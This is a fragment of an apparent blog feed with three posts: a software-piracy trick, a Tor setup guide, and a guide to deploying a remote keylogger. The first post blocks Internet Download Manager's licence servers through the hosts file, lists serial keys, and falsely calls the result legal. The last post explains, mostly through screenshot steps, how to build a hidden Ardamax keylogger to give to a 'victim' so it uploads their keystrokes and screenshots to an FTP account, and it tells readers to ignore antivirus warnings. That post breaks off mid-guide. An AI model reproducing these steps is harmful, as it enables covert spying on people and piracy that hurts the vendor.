dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
So just check out the below trick on how to make IDM ( Internet 
Download Manager ) full version through HOSTS File Trick. The procedure 
is really easy to follow and you can make this happen just in few 
seconds.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
Follow below steps :&lt;/h3&gt;
1. Make sure you have installed the latest version of IDM if you do not have it you can download it from the &lt;a href=&quot;http://www.internetdownloadmanager.com/&quot; target=&quot;_blank&quot;&gt;official creators website&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
2.
 Now after you have downloaded and installed the latest version just 
close the IDM and now go to start menu and make a search for Notepad.&lt;br /&gt;
&lt;br /&gt;
3. Now right click on Notepad and than Run It As Administrator.&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
4. Now navigate to C: &amp;gt; Windows &amp;gt; System 32 &amp;gt; Drivers &amp;gt; etc. &amp;gt; Hosts.&lt;br /&gt;
&lt;br /&gt;
5.
 When you are in the etc. folder you might not see any files their as 
you have click on show all files on the right hand side below.&lt;br /&gt;
&lt;br /&gt;
6. Now open the Hosts file and paste all the below lines like in the image.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;hr /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;&lt;strong&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; tonec.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; www.tonec.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; registeridm.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; www.registeridm.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; secure.registeridm.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; internetdownloadmanager.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; www.internetdownloadmanager.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; secure.internetdownloadmanager.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; mirror.internetdownloadmanager.com&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp; mirror2.internetdownloadmanager.com&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/span&gt;  &lt;br /&gt;
&lt;hr /&gt;
&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&amp;nbsp;&lt;img alt=&quot;Hosts File&quot; border=&quot;0&quot; src=&quot;http://lh3.ggpht.com/-IS82-QRy8iE/Tz_02TvSdfI/AAAAAAAACvU/FbMsqezcwGA/1%25255B17%25255D.png?imgmax=800&quot; height=&quot;489&quot; style=&quot;background-image: none; border-color: -moz-use-text-color; border-style: none; border-width: 0px; display: block; float: none; margin: 0px auto 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;Hosts File&quot; width=&quot;535&quot; /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&amp;nbsp;&amp;nbsp;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;/div&gt;
7.
 So now as you can see in the above image how I have pasted all the 
lines @ the end of the Hosts file, you have to do same as above, now hit
 save. &lt;br /&gt;
8. Now when you have saved the HOSTS File you can simply enter any serials from below in your IDM Registration page.&lt;br /&gt;
&lt;br /&gt;
&lt;div align=&quot;justify&quot;&gt;
&lt;hr /&gt;
&lt;/div&gt;
&lt;div align=&quot;justify&quot;&gt;
&lt;/div&gt;
&lt;div align=&quot;justify&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;RLDGN-OV9WU-5W589-6VZH1&lt;br /&gt;HUDWE-UO689-6D27B-YM28M&lt;br /&gt;UK3DV-E0MNW-MLQYX-GENA1&lt;br /&gt;398ND-QNAGY-CMMZU-ZPI39&lt;br /&gt;GZLJY-X50S3-0S20D-NFRF9&lt;br /&gt;W3J5U-8U66N-D0B9M-54SLM&lt;br /&gt;EC0Q6-QN7UH-5S3JB-YZMEK&lt;br /&gt;UVQW0-X54FE-QW35Q-SNZF5&lt;br /&gt;FJJTJ-J0FLF-QCVBK-A287M&lt;/span&gt;&lt;/strong&gt;  &lt;br /&gt;
&lt;hr /&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
9.
 Now enjoy your full version IDM without purchasing or patching its 
totally genuine and totally legal, you can update and it will still work
 like a charm so if you still have any queries than make sure to comment
 below.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/8005463281624176362/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/how-to-make-idm-full-version-without.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/8005463281624176362'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/8005463281624176362'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/how-to-make-idm-full-version-without.html' title='How to Make IDM Full Version without Patching'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh3.ggpht.com/-IS82-QRy8iE/Tz_02TvSdfI/AAAAAAAACvU/FbMsqezcwGA/s72-c/1%25255B17%25255D.png?imgmax=800" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1953446213870082441</id><published>2012-04-24T14:34:00.000-07:00</published><updated>2013-09-06T07:09:37.368-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>The Onion Routing - highly anonymous</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We all many times use proxies for staying anonymous on internet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLRPBEbJZI/AAAAAAAAABQ/kc2yp2yv9Ew/s1600/anony.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLRPBEbJZI/AAAAAAAAABQ/kc2yp2yv9Ew/s1600/anony.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Lets quickly check out , what we are actually doing&amp;nbsp;while using 
proxies. We first connect to a proxy server which brings resources 
requested by us from the web server.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLIZ5_WKCI/AAAAAAAAAAw/Iril5gcCDT8/s1600/proxy.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;97&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLIZ5_WKCI/AAAAAAAAAAw/Iril5gcCDT8/s320/proxy.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
Thus a proxy server hides our identity &amp;nbsp;by acting as an intermediary 
between us and the web server that we are accessing. You might want to 
read detailed post on proxies here.&lt;br /&gt;
Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner&lt;br /&gt;
of web server &amp;nbsp;starts&amp;nbsp;enquiring about the clients connecting to it using the proxy server &amp;nbsp;and it is possible that &lt;b&gt;owners of proxy server might &amp;nbsp;&amp;nbsp;reveal our identity&lt;/b&gt;. This means we cant actually rely on proxy servers for being anonymous online. Here comes&amp;nbsp;the concept of &lt;b&gt;THE ONION ROUTING (TOR)&lt;/b&gt; into picture. &lt;b&gt;By
 using this , the client traffic is supposed to be passed&amp;nbsp;from three 
different servers or nodes before reaching to actual web server. It may 
randomly take any path through&amp;nbsp;any three nodes.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLIm0g0h0I/AAAAAAAAAA4/JDGeQZSTeQ8/s1600/tor.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;237&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLIm0g0h0I/AAAAAAAAAA4/JDGeQZSTeQ8/s320/tor.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
Lets consider it has taken path shown by&amp;nbsp;green arrows. Now&lt;br /&gt;
&lt;br /&gt;
* Node 1 knows only actual origin(client) but not actual destinantion(web server).&lt;br /&gt;
*Node 5 neither knows actual origin nor actual destinantion.&lt;br /&gt;
*Node 9 knows actual destination but not actual origin.&lt;br /&gt;
&lt;br /&gt;
Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.&lt;br /&gt;
&lt;br /&gt;
Installing and Using TOR.&lt;br /&gt;
&lt;br /&gt;
Step 1. Download the TOR client from &lt;a href=&quot;http://www.ziddu.com/download/12331095/vidalia-bundle-0.2.1.26-0.2.10-1.exe.html&quot;&gt;here&lt;/a&gt; and run the setup . &lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Note: You need to install a Mozilla firefox add on which is included in package you have downloaded to use Tor.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSLIqQX2iYI/AAAAAAAAAA8/OtwXsynwzP4/s1600/yy1.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSLIqQX2iYI/AAAAAAAAAA8/OtwXsynwzP4/s320/yy1.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSLIvX0YYXI/AAAAAAAAABA/OgoBFKlS0qE/s1600/yy2.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSLIvX0YYXI/AAAAAAAAABA/OgoBFKlS0qE/s320/yy2.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLIxzAhm8I/AAAAAAAAABE/y5epHlfWBZs/s1600/yy3.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;243&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLIxzAhm8I/AAAAAAAAABE/y5epHlfWBZs/s320/yy3.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSLI0QFzitI/AAAAAAAAABI/qpqXRW3sm0w/s1600/yy4.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;216&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSLI0QFzitI/AAAAAAAAABI/qpqXRW3sm0w/s320/yy4.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLI2YCmhqI/AAAAAAAAABM/XbreuB0gTTk/s1600/yy5.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;233&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSLI2YCmhqI/AAAAAAAAABM/XbreuB0gTTk/s320/yy5.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
Step 2. Open the &#39;Vidalia Control Panel&#39; from the task bar and Click on &#39;Start Tor&#39;.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLIjQ6_YiI/AAAAAAAAAA0/92xbrEH9Eg0/s1600/tor+click.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;176&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLIjQ6_YiI/AAAAAAAAAA0/92xbrEH9Eg0/s320/tor+click.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
Step3. Now open Mozilla Firefox browser, single click on red highlighted
 &#39;Tor Disabled&#39; on right corner of browser&amp;nbsp;and it will turn to green 
highlighted &#39;Tor Enabled&#39;.&lt;br /&gt;
&lt;br /&gt;
Now just log on to &#39;www.whatismyip.com&#39; and you will see your new public
 IP address that will keep changing&amp;nbsp;after an interval of time according 
to the path randomly taken by web traffic through three different nodes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
NOTE: Guys This Post is Copied From &#39;Www.ExploreHacking.Com&#39; &lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1953446213870082441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/onion-routing-highly-anonymous.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1953446213870082441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1953446213870082441'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/onion-routing-highly-anonymous.html' title='The Onion Routing - highly anonymous'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSLRPBEbJZI/AAAAAAAAABQ/kc2yp2yv9Ew/s72-c/anony.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-4012025811832192855</id><published>2012-04-22T15:17:00.001-07:00</published><updated>2013-09-05T06:45:38.190-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Remote Keylogger - configure and use</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
Keyloggers are the best to spy upon anyone but many beginners find 
problem in using remote keyloggers . So in this post , I will be showing
 you the same.Remote keyloggers are very easy to use in comparison to 
trojans where the concepts like IP addresses, port forwarding are 
involved. &lt;b&gt;&amp;nbsp;I&amp;nbsp;highly recommend you to read the basics of keyloggers &lt;a href=&quot;http://www.explorehacking.com/2011/01/keyloggers-basics.html&quot;&gt;here&lt;/a&gt; .&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQilo0l4VI/AAAAAAAAADs/1OVmJrlCc0Y/s1600/keystrokes.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;132&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQilo0l4VI/AAAAAAAAADs/1OVmJrlCc0Y/s200/keystrokes.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;Requirements :-&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;
1. Download a free remote keylogger &#39;Ardamax&#39; with its serial key &lt;a href=&quot;http://www.ziddu.com/download/13322433/ardamax.rar.html&quot;&gt;here&lt;/a&gt;. &lt;i&gt;Password:explorehacking.com&lt;/i&gt;.&lt;i&gt; &lt;/i&gt;Antivrus might detect it as a virus but dont worry.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
2. Signup at any webhosting site supporting FTP (file transfer protocol) and note down your ftp host name.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
For example , I have signed up at www.my3gb.com and ftp host name is &amp;nbsp;username.my3gb.com .&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;We are actually gonna create an executable(exe) file, 
which would be given to victim and he is supposed to run it. The 
keylogger would be installed on his computer and we would be getting 
automatically keylogs/screenshots in our web hosting site ftp account&lt;/b&gt;.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
I have added the self-explanatory pictures, follow them.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQR-kA6YhI/AAAAAAAAACk/xqNCpyws568/s1600/key1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;246&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQR-kA6YhI/AAAAAAAAACk/xqNCpyws568/s320/key1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSAVy7ZKI/AAAAAAAAACo/hmBxlxSW0vY/s1600/key2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;246&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSAVy7ZKI/AAAAAAAAACo/hmBxlxSW0vY/s320/key2.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSCLX8yGI/AAAAAAAAACs/WjhKzDarxxA/s1600/key3.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;247&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSCLX8yGI/AAAAAAAAACs/WjhKzDarxxA/s320/key3.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSEFBiO5I/AAAAAAAAACw/v1xP0Vk30jY/s1600/key4.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;245&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSEFBiO5I/AAAAAAAAACw/v1xP0Vk30jY/s320/key4.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSFk5i7YI/AAAAAAAAAC0/wP4Kf2N_q1s/s1600/key5.0.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSFk5i7YI/AAAAAAAAAC0/wP4Kf2N_q1s/s320/key5.0.jpg&quot; width=&quot;246&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;After entering registration key, click on Remote Installation&lt;br /&gt;
option . If it still says that its &amp;nbsp;unregistered version, restart computer.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSLIfff9I/AAAAAAAAAC8/bgzHOSwnnCI/s1600/key6.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSLIfff9I/AAAAAAAAAC8/bgzHOSwnnCI/s320/key6.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSQSNTDJNaI/AAAAAAAAADA/sDDPUp4tePQ/s1600/key7.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;279&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSQSNTDJNaI/AAAAAAAAADA/sDDPUp4tePQ/s320/key7.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSQSRZdaDjI/AAAAAAAAADE/wQ_pvF1w4HY/s1600/key8.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;275&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSQSRZdaDjI/AAAAAAAAADE/wQ_pvF1w4HY/s320/key8.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSTUgWuBI/AAAAAAAAADI/ixxfbR3FE5w/s1600/key9.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;273&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSTUgWuBI/AAAAAAAAADI/ixxfbR3FE5w/s320/key9.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSXnCAf-I/AAAAAAAAADM/vxkT65rzIqU/s1600/key10.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSXnCAf-I/AAAAAAAAADM/vxkT65rzIqU/s320/key10.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSaNM-U-I/AAAAAAAAADQ/VcaeSezeYcY/s1600/key11.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSaNM-U-I/AAAAAAAAADQ/VcaeSezeYcY/s320/key11.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;Keylogger would run invisibly on victim&#39;s computer. Victim have would have to&lt;br /&gt;
press Ctrl+Shift+Alt+H and enter the password you have set to make it visible.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQScBswyeI/AAAAAAAAADU/2YrPnKVtyOc/s1600/key12.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;275&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQScBswyeI/AAAAAAAAADU/2YrPnKVtyOc/s320/key12.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSefWql8I/AAAAAAAAADY/9Nkn4QWBCJU/s1600/key13.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSQSefWql8I/AAAAAAAAADY/9Nkn4QWBCJU/s320/key13.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
FTP
 hostname may be different for different web hosting sites. Mostly it is
 username.webhostingsite.com . You can specify any remote folder in 
which you wish to get logs. After filling all details, click on &#39;Test&#39; 
and you would get any test file to make sure that &amp;nbsp;information you 
filled is valid and FTP connection is okay.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
